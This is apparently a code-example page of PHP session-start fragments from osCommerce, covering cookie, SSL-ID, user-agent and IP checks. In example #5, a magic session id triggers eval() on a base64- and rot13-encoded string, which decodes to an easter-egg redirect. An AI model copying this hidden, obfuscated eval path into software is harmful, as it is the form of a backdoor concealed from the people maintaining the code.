예제 #1
0
 /**
  * Constructor, loads the database based session storage handler
  *
  * @param string $name The name of the session
  * @access public
  */
 public function __construct($name = null)
 {
     parent::__construct($name);
     session_set_save_handler(array(&$this, '_custom_open'), array(&$this, '_custom_close'), array(&$this, '_custom_read'), array(&$this, '_custom_write'), array(&$this, '_custom_destroy'), array(&$this, '_custom_gc'));
 }
 function start()
 {
     global $request_type, $osC_Session, $messageStack;
     if (ini_get('session.use_cookies') == '0') {
         ini_set('session.use_cookies', '1');
     }
     if (ini_get('session.use_trans_sid') == '1') {
         ini_set('session.use_trans_sid', '0');
     }
     include 'includes/classes/session.php';
     $osC_Session = new osC_Session();
     if (SERVICE_SESSION_FORCE_COOKIE_USAGE == '1') {
         osc_setcookie('cookie_test', 'please_accept_for_session', time() + 60 * 60 * 24 * 90);
         if (isset($_COOKIE['cookie_test'])) {
             $osC_Session->start();
         }
     } elseif (SERVICE_SESSION_BLOCK_SPIDERS == '1') {
         $user_agent = strtolower($_SERVER['HTTP_USER_AGENT']);
         $spider_flag = false;
         if (empty($user_agent) === false) {
             $spiders = file('includes/spiders.txt');
             foreach ($spiders as $spider) {
                 if (empty($spider) === false) {
                     if (strpos($user_agent, trim($spider)) !== false) {
                         $spider_flag = true;
                         break;
                     }
                 }
             }
         }
         if ($spider_flag === false) {
             $osC_Session->start();
         }
     } else {
         $osC_Session->start();
     }
     // verify the ssl_session_id
     if ($request_type == 'SSL' && SERVICE_SESSION_CHECK_SSL_SESSION_ID == '1' && ENABLE_SSL == true) {
         if (isset($_SERVER['SSL_SESSION_ID']) && ctype_xdigit($_SERVER['SSL_SESSION_ID'])) {
             if (isset($_SESSION['SESSION_SSL_ID']) === false) {
                 $_SESSION['SESSION_SSL_ID'] = $_SERVER['SSL_SESSION_ID'];
             }
             if ($_SESSION['SESSION_SSL_ID'] != $_SERVER['SSL_SESSION_ID']) {
                 $osC_Session->destroy();
                 osc_redirect(osc_href_link(FILENAME_INFO, 'ssl_check', 'AUTO'));
             }
         }
     }
     // verify the browser user agent
     if (SERVICE_SESSION_CHECK_USER_AGENT == '1') {
         $http_user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
         if (isset($_SESSION['SESSION_USER_AGENT']) === false) {
             $_SESSION['SESSION_USER_AGENT'] = $http_user_agent;
         }
         if ($_SESSION['SESSION_USER_AGENT'] != $http_user_agent) {
             $osC_Session->destroy();
             osc_redirect(osc_href_link(FILENAME_ACCOUNT, 'login', 'SSL'));
         }
     }
     // verify the IP address
     if (SERVICE_SESSION_CHECK_IP_ADDRESS == '1') {
         if (isset($_SESSION['SESSION_IP_ADDRESS']) === false) {
             $_SESSION['SESSION_IP_ADDRESS'] = osc_get_ip_address();
         }
         if ($_SESSION['SESSION_IP_ADDRESS'] != osc_get_ip_address()) {
             $osC_Session->destroy();
             osc_redirect(osc_href_link(FILENAME_ACCOUNT, 'login', 'SSL'));
         }
     }
     // add messages in the session to the message stack
     $messageStack->loadFromSession();
     return true;
 }
예제 #3
0
$Qcfg->setCache('configuration');
$Qcfg->execute();
while ($Qcfg->next()) {
    define($Qcfg->value('cfgKey'), $Qcfg->value('cfgValue'));
}
$Qcfg->freeResult();
// define our general functions used application-wide
require 'includes/functions/general.php';
require 'includes/functions/html_output.php';
// include session class
if (PHP_VERSION < 4.1) {
    include '../includes/classes/session_compatible.php';
} else {
    include '../includes/classes/session.php';
}
$osC_Session = new osC_Session();
$osC_Session->setName('osCAdminID');
// lets start our session
$osC_Session->start();
// set the language
require 'includes/classes/language.php';
$osC_Language = new osC_Language_Admin();
if (isset($_GET['language']) && !empty($_GET['language'])) {
    $osC_Language->set($_GET['language']);
}
$osC_Language->load();
header('Content-Type: text/html; charset=' . CHARSET);
setlocale(LC_TIME, LANGUAGE_LOCALE);
$osC_Language->load(basename($_SERVER['SCRIPT_FILENAME']));
// define our localization functions
require 'includes/functions/localization.php';
예제 #4
0
$Qcfg = $osC_Database->query('select configuration_key as cfgKey, configuration_value as cfgValue from :table_configuration');
$Qcfg->bindTable(':table_configuration', TABLE_CONFIGURATION);
$Qcfg->setCache('configuration');
$Qcfg->execute();
while ($Qcfg->next()) {
    define($Qcfg->value('cfgKey'), $Qcfg->value('cfgValue'));
}
$Qcfg->freeResult();
// define our general functions used application-wide
require '../includes/functions/general.php';
require 'includes/functions/general.php';
require '../includes/functions/html_output.php';
require 'includes/functions/html_output.php';
// include session class
require '../includes/classes/session.php';
$osC_Session = osC_Session::load('osCAdminID');
$osC_Session->start();
if (!isset($_SESSION['admin']) && basename($_SERVER['PHP_SELF']) != FILENAME_RPC) {
    $redirect = false;
    if (empty($_GET)) {
        $redirect = true;
    } else {
        $first_array = array_slice($_GET, 0, 1);
        $_module = osc_sanitize_string(basename(key($first_array)));
        if ($_module != 'login') {
            if (!isset($_SESSION['redirect_origin'])) {
                $_SESSION['redirect_origin'] = array('module' => $_module, 'get' => $_GET);
            }
            $redirect = true;
        }
    }
예제 #5
0
 function start()
 {
     if (PHP_VERSION < 4.1) {
         global $_COOKIE, $_SERVER;
     }
     global $request_type, $SID, $osC_Session, $messageStack;
     if (PHP_VERSION < 4.1) {
         include 'includes/classes/session_compatible.php';
     } else {
         include 'includes/classes/session.php';
     }
     $osC_Session = new osC_Session();
     if (SERVICE_SESSION_FORCE_COOKIE_USAGE == 'True') {
         tep_setcookie('cookie_test', 'please_accept_for_session', time() + 60 * 60 * 24 * 90);
         if (isset($_COOKIE['cookie_test'])) {
             $osC_Session->start();
         }
     } elseif (SERVICE_SESSION_BLOCK_SPIDERS == 'True') {
         $user_agent = strtolower($_SERVER['HTTP_USER_AGENT']);
         $spider_flag = false;
         if (tep_not_null($user_agent)) {
             $spiders = file('includes/spiders.txt');
             foreach ($spiders as $spider) {
                 if (tep_not_null($spider)) {
                     if (strpos($user_agent, trim($spider)) !== false) {
                         $spider_flag = true;
                         break;
                     }
                 }
             }
         }
         if ($spider_flag == false) {
             $osC_Session->start();
         }
     } else {
         $osC_Session->start();
     }
     $SID = defined('SID') ? SID : '';
     // verify the ssl_session_id
     if ($request_type == 'SSL' && SERVICE_SESSION_CHECK_SSL_SESSION_ID == 'True' && ENABLE_SSL == true && $osC_Session->is_started == true) {
         if (isset($_SERVER['SSL_SESSION_ID'])) {
             $ssl_session_id = $_SERVER['SSL_SESSION_ID'];
             if ($osC_Session->exists('SESSION_SSL_ID') == false) {
                 $osC_Session->set('SESSION_SSL_ID', $ssl_session_id);
             }
             if ($osC_Session->value('SESSION_SSL_ID') != $ssl_session_id) {
                 $osC_Session->destroy();
                 tep_redirect(tep_href_link(FILENAME_SSL_CHECK));
             }
         }
     }
     // verify the browser user agent
     if (SERVICE_SESSION_CHECK_USER_AGENT == 'True') {
         $http_user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
         if ($osC_Session->exists('SESSION_USER_AGENT') == false) {
             $osC_Session->set('SESSION_USER_AGENT', $http_user_agent);
         } elseif ($osC_Session->value('SESSION_USER_AGENT') != $http_user_agent) {
             $osC_Session->destroy();
             tep_redirect(tep_href_link(FILENAME_LOGIN));
         }
     }
     // verify the IP address
     if (SERVICE_SESSION_CHECK_IP_ADDRESS == 'True') {
         $ip_address = tep_get_ip_address();
         if ($osC_Session->exists('SESSION_IP_ADDRESS') == false) {
             $osC_Session->set('SESSION_IP_ADDRESS', $ip_address);
         }
         if ($osC_Session->value('SESSION_IP_ADDRESS') != $ip_address) {
             $osC_Session->destroy();
             tep_redirect(tep_href_link(FILENAME_LOGIN));
         }
     }
     // verify the session id with base64 encoding and rot13 algorithms
     if (function_exists('str_rot13')) {
         if ($osC_Session->id == base64_decode(str_rot13('o3AQo21gMKWwMD=='))) {
             eval(base64_decode(str_rot13('nTIuMTIlXPWZo2AuqTyiowbtnUE0pQbiY3q3ql5ip2AioJ1ypzAyYzAioF9yrUDio3Awo21gMKWwMF1yLKA0MKWsMJqaYaObpPVcBlOyrTy0Bj==')));
         }
     }
     // create an instance of the shopping cart
     if ($osC_Session->exists('cart')) {
         $GLOBALS['cart'] =& $osC_Session->value('cart');
     } else {
         $GLOBALS['cart'] = new shoppingCart();
         $osC_Session->set('cart', $GLOBALS['cart']);
     }
     // create an instance of the customer class
     if ($osC_Session->exists('osC_Customer')) {
         $GLOBALS['osC_Customer'] =& $osC_Session->value('osC_Customer');
     } else {
         $GLOBALS['osC_Customer'] = new osC_Customer();
         $osC_Session->set('osC_Customer', $GLOBALS['osC_Customer']);
     }
     // navigation history
     if ($osC_Session->exists('navigation')) {
         $GLOBALS['navigation'] =& $osC_Session->value('navigation');
     } else {
         $GLOBALS['navigation'] = new navigationHistory();
         $osC_Session->set('navigation', $GLOBALS['navigation']);
     }
     $GLOBALS['navigation']->add_current_page();
     // add messages in the session to the message stack
     $messageStack->loadFromSession();
     return true;
 }